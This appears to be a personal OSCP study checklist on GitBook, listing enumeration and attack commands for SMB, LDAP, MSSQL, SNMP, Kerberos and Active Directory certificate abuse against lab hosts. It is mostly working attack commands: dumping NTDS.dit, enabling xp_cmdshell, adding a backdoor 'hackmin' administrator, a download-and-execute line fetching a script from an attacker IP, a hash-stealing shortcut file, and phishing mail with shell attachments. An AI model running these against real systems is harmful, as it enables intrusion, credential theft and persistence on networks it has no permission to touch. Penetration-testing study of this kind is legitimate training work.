> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/enumeration/enumeration-checklist.md). # đź“‹Enumeration Checklist ## **REVERT AFTER INITIAL ENUMERATION** #### IF PHP SHELL REQUIRED USE **PHP Ivan Sincek** from revshells Sometimes if the payload is not working try: ```bash sudo ifconfig tun0 mtu 1250 ``` * [ ] Full tty for linux: ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` ## Windows Privesc Checklist If windows then just use *rdesktop* to connect without credentials and check version * [ ] [Winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) * [ ] [PrivescCheck](https://github.com/itm4n/PrivescCheck) * [ ] [Adpeas](https://github.com/61106960/adPEAS) To check if Powershell or CMD: ```powershell (dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell ``` ## Enumeration Rustscan: ```bash rustscan -a 192.168.234.62 --accessible --ulimit 5000 -- -sC -sV ``` * [ ] Check default passwords and try to bruteforce with the respective worldlists from seclists. * [ ] Check for http websites on unusual ports * [ ] If upload present try **ntlm-theft** * [ ] If website files are accessible by htdocs,etc then try to upload shell.php by symlink or directly. * [ ] If .NET use iLspy or dnspy or dotpeek * [ ] If zip file use evilarc for path traversal ### Netexec * [ ] Password policy: `nxc smb 10.10.10.161 --pass-pol -u '' -p ''` * [ ] To enumerate users: `nxc smb 172.16.5.5 --users`\ Groups enumeration: `--groups` * [ ] Laps password: ``` nxc winrm -u user-can-read-laps -p pass --laps ``` Add name at end if administrator is a different user * [ ] Bloodhound ``` nxc ldap -u user -p pass --bloodhound -c All -ns ``` * [ ] NTDS.dit from DC: ``` nxc smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds ``` * [ ] To spider a share : ``` nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares' ``` * [ ] If local admin then can [Pass the Password or Pass the Hash](/oscp/readme/active-directory/ad-exploitation/pass-the-password-or-pass-the-hash.md) to privilege escalate * [ ] To check credentials in gpp: ``` nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin ``` * [ ] Asreproasting: ``` nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt ``` or with wordlist : ``` nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt ``` * [ ] To check if computers can be added ``` nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq ``` * [ ] Run commands on behalf of other users: ``` nxc smb -u -p -M schtask_as -o USER= CMD= ``` Quickly add user to domain admin: ``` powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\" ``` * [ ] Security questions: ``` nxc smb -u user -p pass -M security-questions ``` * [ ] for more commands ### HTTP * [ ] Try cadaver and try to upload shell * [ ] Try bruteforce with burp before hydra. ### SNMP (UDP 161) * [ ] Use snmpwalk ```bash snmpwalk -c public -v1 -t 10 192.168.50.151 ``` Add one of these at the end in snmpwalk | 1.3.6.1.2.1.25.1.6.0 | System Processes | | ---------------------- | ---------------- | | 1.3.6.1.2.1.25.4.2.1.2 | Running Programs | | 1.3.6.1.2.1.25.4.2.1.4 | Processes Path | | 1.3.6.1.2.1.25.2.3.1.4 | Storage Units | | 1.3.6.1.2.1.25.6.3.1.2 | Software Name | | 1.3.6.1.4.1.77.1.2.25 | User Accounts | | 1.3.6.1.2.1.6.13.1.3 | TCP Local Ports | Then try: ``` snmpwalk -v2c -c public $IP NET-SNMP-EXTEND-MIB::nsExtendOutputFull ``` `-v` - 1 ,2c ,3 To bruteforce community strings: ``` hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 10.10.255.200 snmp ``` Then can use snmp-check to get more info: ``` snmp-check -c 'community-string-here' ``` For brute-forcing ip: ``` echo public > community echo private >> community echo manager >> community for ip in $(seq 1 254); do echo 192.168.215.$ip; done > ips onesixtyone -c community -i ips ``` ### tftp To bruteforce files in tftp: ``` sudo nmap -Pn -sU -p69 --script tftp-enum 192.168.209.149 ``` ### ICMP * [ ] Can ping whole subnet `fping -asgq 172.16.5.0/23` ### SMTP * To send an email with smtp server: ```bash sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com --attach @config.Library-ms --server 192.168.167.199 -body @body.txt -header "Subject:Problems" -ap ``` Add `-ap` for authentication Or: ``` sendemail -f 'jonas@localhost' \ -t 'mailadmin@localhost' \ -s 192.168.219.140:25 \ -u 'a spreadsheet' \ -m 'Please check this spreadsheet' \ -a shell.ods ``` ### DNS * [ ] To dump all dns: `adidnsdump -u inlanefreight\\forend ldap://172.16.5.5` to resolve unknown records use `-r` * [ ] To find other domains: ``` dig @10.10.11.174 +short support.htb any ``` * [ ] Zone transfer info to find other domains: ``` dig @ axfr flight.htb ```
* [ ] Use host or dnsrecon command and use -t to select dns record type `host -t mx megacorpone.com` `dnsrecon -d megacorpone.com -t std` ### SMB(139,445) * [ ] Check for anonymous access: * [ ] `smbmap -u guest -H ` * [ ] For anonymous `cme smb 10.10.11.202 -u 'anon' -p '' --shares` * [ ] Scan SMB: ``` sudo nmap --script smb-vuln* ``` * [ ] If hashes are acquired from mssql or smb then try [SMB Relaying](/oscp/readme/active-directory/ad-exploitation/smb-relaying.md) if message signing disabled. Check with ```bash nxc smb 10.10.143.69-71(ip range) --gen-relay-list relay.txt ``` * [ ] Check for interesting scripts in SYSVOL: `ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts` and might find passwords in .vbs files * [ ] To bruteforce usernames: ```bash nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute ``` * [ ] To mount a share: ``` sudo mount -t cifs -o 'user=username,password=pass' ///share /mnt/share ``` * [ ] If the share looks like it is being accessed try to capture NTLMv2 hashes by using evil url and responder(analysis mode): ``` [InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\10.8.1.208\%USERNAME%.icon IconIndex=1 ``` * [ ] For OS discovery `nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152` * [ ] For older windows version: `sudo nmap --script smb-vuln* 192.168.180.40` * [ ] If a shared share is discovered try multiple poisoned files. Easiest is ntlmtheft. ### FTP(21) * [ ] Check for ftp anonyomous access: * [ ] `ftp ` * [ ] To bruteforce use medusa `medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp` * [ ] Default location is /var/ftp * [ ] `quote PASV` to fix ftp or use `passive` * [ ] List files: ``` nxc ftp 192.168.0.10 -u 'marshall' -p 'badpassword' --ls ``` * [ ] Upload/Download ``` netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --put [LOCAL_FILE] [REMOTE_FILE] ``` ``` netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --get [FILE] ``` ### Postgres * [ ] Try authentication with admin:admin or postgres:postgres and such variations ``` psql -U postgres -W -h 192.168.212.47 -p 5437 ``` * [ ] To view current user: ``` SELECT user; ``` * [ ] To get list of databases: ``` \list ``` * [ ] To check version: ``` SELECT version(); ``` Now check for exploits and use `searchsploit -m multiple/remote/50847.py` if version from 9.3 to 11.7 ### MSSQL * [ ] Check version ``` select @@version; ``` * [ ] Check databases ``` SELECT name FROM master.dbo.sysdatabases ``` * [ ] Check tables in database: ``` SELECT * FROM .INFORMATION_SCHEMA.TABLES; ``` * [ ] We can check user: ``` select system_user; ``` * [ ] Check as what user the db is running: ``` exec xp_dirtree "\\10.8.1.208\share" ``` Catch with responder or smbserver * [ ] If chain try [SMB Relaying](/oscp/readme/active-directory/ad-exploitation/smb-relaying.md) * [ ] To get an interactive mssql shell: `mssqlclient.py user:pass@sequel.htb` * [ ] If password present try / * [ ] To enable xp\_cmdshell: ``` EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; ``` or ``` EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- ``` * [ ] Check for impersonation: ``` SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' ``` Refer PG Practice- hokkaido * [ ] To audit: `Invoke-SQLAudit -Verbose` from PowerUpSQL * [ ] look for privesc cheatsheat in powerupsql github ### RPC * [ ] enumerate `rpcclient -U '' -N ` then try `enumdomusers`,`querydispinfo`,etc. * [ ] Only users: ``` rpcclient -U "" -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt ``` * [ ] User info can be changed with `setuserinfo`. To change oassword: ``` setuserinfo christopher.lewis 23 'Admin!23' ``` ### RDP * [ ] To connect to rdp: ``` xfreerdp /u:offsec /p:lab /v:192.168.183.250 /cert-ignore /compression /auto-reconnect /drive:/tmp,tmp +clipboard ``` If any black screen problems: ``` sudo ifconfig tun0 mtu 1250 ``` * [ ] If administrator get RDP by using Enable\_RDP.ps1 script: ``` Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 $username = "hackmin" $password = ConvertTo-SecureString "Password123$" -AsPlainText -Force New-LocalUser -Name "$username" -Password $password -FullName "$username" -Description "hackmin" Add-LocalGroupMember -Group "Administrators" -Member "$username" ``` ``` iex ((New-Object System.Net.WebClient).DownloadString('http://${ATTACKER_IP}:${ATTACKER_PORT}/Enable_RDP.ps1')) ``` ### Ldap * [ ] Netexec ldap more to less info order: ``` nxc ldap 192.168.235.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' --query "(objectClass=*)" "*" ``` ``` nxc ldap 192.168.235.122 -u '' -p '' --query "(sAMAccountName=*)" "*" ``` ``` nxc ldap -u username -p password --query "(sAMAccountName=Administrator)" "" ``` Change the name here ``` nxc ldap -u username -p password --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet" ``` To get descriptions for users: ``` nxc ldap 192.168.235.122 -u '' -p '' -M get-desc-users ``` * [ ] ldapnomnom for bruteforcing usernames fast asf. Check for usernames with ``` ldapnomnom --input 10m_usernames.txt --output multiservers.txt --dnsdomain contoso.local --maxservers 32 --parallel 16 ``` ``` ldapnomnom --input 10m_usernames.txt --output results.txt --server 192.168.0.11 --parallel 4 ``` Extract rootDSE attributes: ``` ldapnomnom --output rootDSEs.json --dump ``` * [ ] Using nmap to enumerate ldap ``` nmap -sV --script "ldap* and not brute" ` ``` * [ ] Check ldap using ldapsearch: `ldapsearch -x -H ldap://` * [ ] Get FQDN :`ldapsearch -x -H ldap:// -s base namingcontexts` * [ ] Get all info: ``` ldapsearch -x -H ldap://192.168.218.122 -s base namingcontexts ``` Get everything to grep for: ``` ldapsearch -x -H ldap://192.168.192.122 -D '' -w '' -b "DC=hutch,DC=offsec" > ldap-search ``` ``` ldapsearch -H ldap:// -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" ``` Analysing: ``` cat ldap.txt | awl '{print $1}' | sort | uniq -c| sort -n | grep ':' ``` Print first word then sort then print unique and then show non repeating.`grep ':'` removes the base64 stuff. * [ ] To **enumerate users** over ldap (ldap can be finicky revert): ``` ldapsearch -H ldap:// -x -b "DC=absolute,DC=htb" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " ``` Optionally use authentication with `-U` and `-w` for username and password * [ ] To get everything: ``` ldapsearch -x -H ldap://192.168.192.122 -D '' -w '' -b "DC=hutch,DC=offsec" ``` * \[ ] ``` ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U ``` * [ ] To enumerate various things use windapsearch.py ``` python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da ``` use -PU for potential users with elevated privileges that might have gone unnoticed * [ ] To check for domain admins ``` python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da ``` * [ ] TO check for privileged users ``` python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU ``` ### Miscellaneous * [ ] Use [lazagne](https://github.com/AlessandroZ/LaZagne) to search for stored credentials in web browsers,applications,etc. * [ ] If Groupds.xml found use *gpp-decrypt* ## Active Directory
If linux and sudo user check: `/etc/krb5.keytab` ### [MindMaps](https://orange-cyberdefense.github.io/ocd-mindmaps/) [2024](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg) ### [Kerberoasting](/oscp/readme/active-directory/ad-exploitation/kerberoasting.md) Try kerberoasting if you have credentials or a shell on the target machine ### [Asreproasting](/oscp/readme/active-directory/ad-exploitation/asreproasting.md) **Linux** * [ ] `GetUserSPNs.py -dc-ip dc01.hybrid.vl hybrid.vl/peter.turner` * [ ] Use kerbrute to bruteforce usernames and asreproast ``` kerbrute userenum --dc dc.absolute.htb -d absolute.htb username.txt ``` * [ ] For etype 23 hash: `--downgrade` * [ ] For bruteforce: `/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt` * [ ] bruteforce from * [ ] To get Ticket Granting Ticket:`getTGT.py absolute.htb/d.klay` * [ ] Bloodhound with TGT: ``` KRB5CCNAME=d.klay.ccache ./bloodhound.py -k -dc dc.absolute.htb -ns 10.10.11.181 -c All -d absolute.htb -u d.klay@absolute.htb ``` * [ ] Hunting for Users with Kerberoast Pre-auth Not Required: ``` GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users ``` **Windows** To enumerate for asreproastable users (PowerView): ``` Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl ``` * [ ] Rubeus method: `.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat` ### Certificate Authority(CA) * [ ] `nxc ldap sendai.vl -u Elliot.Yates -p 'aditya123@' -M adcs` * [ ] To check for vulnerable certificates `sudo certipy-ad find -u 'a.briggs' -p 'password' -dc-ip -stdout -vulnerable` To get in bloodhound: `-old-bloodhound` * [ ] Add [custom queries](https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json) in `~./config/bloodhound/customqueries.json` #### Esc1 * [ ] To request certificate: ``` certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn 'administrator@hybrid.vl' -dc-ip 10.10.208.21 -key-size 4096 -debug ``` * [ ] To auth: ``` certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.208.21 ``` #### Esc4 * [ ] Convert to ESC1 and follow ESC1 procedure: ``` certipy template -username 'clifford.davey'@sendai.vl -password RFmoB2WplgE_3p -template SendaiComputer -save-old ``` * [ ] Try [PetitPotam](/oscp/readme/active-directory/ad-exploitation/petitpotam.md) * [ ] Check nmap for certificate authority * [ ] If found enumerate post exploitation with [certify.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) * [ ] Refer Absolute-HTB for more details ### DNS Records * [ ] Add a new computer: ``` addcomputer.py -dc-ip 10.10.67.128 -computer-pass EvilYeeb123 -computer-name evilyeeb sendai.vl/Susan.Harper:'Password123' ``` * [ ] Then use dnstool.py: ``` dnstool.py -u 'sendai.vl\evilyeeb$' -p 'EvilYeeb123' -r evilyeeb.sendai.vl -d 10.8.0.193 --action add DC.sendai.vl -dns-ip 10.10.67.128 ``` ### Bloodhound If SID is displayed it is a **local account**. BloodHound uses this representation of a principal when the domain identifier of the SID is from a local machine Use **Collection Loops to not miss information.** * bloodhound.py ingestor ``` bloodhound.py -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all --zip ``` can also use `-dns-tcp` * [ ] **Manual commands**: Format for cypher: ``` (NODES)-[:RELATIONSHIP]->(NODES) ``` All computers in domain: ``` MATCH (m:Computer) RETURN m ``` All Users in domain: ``` MATCH (m:User) RETURN m ``` To get active sessions: ``` MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p ``` * [ ] **If error try dnschef:** ``` dnschef --fakeip 10.10.225.134 ``` ``` bloodhound.py -u 'rsmith' -p 'IHateEric2' -d lab.trusted.vl -dc labdc.lab.trusted.vl -c all -ns 127.0.0.1 ``` * [ ] If we have shell access on the target ``` SharpHound.exe -c All ``` `--Loop --LoopDuration 00:10:00` to loop * [ ] **To get all users** ``` cat 20240302180235_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r ``` * [ ] If object-id of a group is above *1000* it is non default * [ ] Bloodhound doesn't collect *Info* so check that with ldapsearch * [ ] Raw query to enumerate users with SQLAdmin: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2` * [ ] Raw query to enumerate users with CanPSRemote: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2` ### Security and Obfuscation * [ ] Powershell command for windows defender `Get-MpComputerStatus` * [ ] There are multiple locations for powershell if blocked: `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` * [ ] To check whitelist apps: `Get-AppLockerPolicy` * [ ] To find the users who can read Local Administrator Password Solution (LAPS) passwords`Find-LAPSDelegatedGroups` * [ ] To check if LAPS enabled or cleartext passwords sometimes `Get-LAPSComputers` ### Impacket * [ ] GetNPUsers - This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' for asrep roasting. * [ ] `GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat` * [ ] GetUserSPN - For kerberoasting as it Queries target domain for SPNs that are running under a user account * [ ] List SPN accounts`GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend` add `-request`to get in hashcat format or `-request-user` to get only for the user ### ACL(Access Control List) #### PowerView Suppose we have a single user and want to enumerate ACL from there. In these examples the user is wley ``` Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley ``` Now to get ACL: ``` Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} ```
#### Without PowerView * To get all users list ``` Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt ``` * Now getting the data with Get-ACL: ``` foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}} ```
Here we have access over damundsen * Then to convert the GUID use: ``` $guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl ``` * To further enumerate damundsen ``` $sid2 = Convert-NameToSid damundsen PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose Access over HelpDesk ```
* To enumerate Help Desk ``` Get-DomainGroup -Identity "Help Desk Level 1" | select memberof ``` ### [DCSync](/oscp/readme/active-directory/ad-exploitation/dcsync.md) #### [#powerview](#powerview "mention") * [ ] To get passwords in descriptions: ``` Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} ``` * [ ] Checking for PASSWD\_NOTREQD Setting ``` Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol ``` * [ ] Checking for pre auth kerberos not required ``` Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl ``` * [ ] Enumerating GPO names:\ PowerShell:`Get-DomainGPO |select displayname` Built-in:`Get-GPO -All | Select DisplayName` * [ ] Rights Over GPO: ``` $sid=Convert-NameToSid "Domain Users" PS C:\htb> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} ``` To abuse GPO misconfiguration: [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) ## PFX * To open certificate ``` openssl pkcs12 -in file.pfx -info ``` If pfx file is encountered and it is password protected use `pfx2john` * To extract certificate and key: ``` openssl pkcs12 -in file.pfx -nocerts -out key.pem -nodes ``` ``` openssl pkcs12 -in file.pfx -nokeys -out key.cert ``` * We can use winrm to login using keys. ``` evil-winrm -S -i -c key.cert -k key.pem ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/enumeration/enumeration-checklist.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.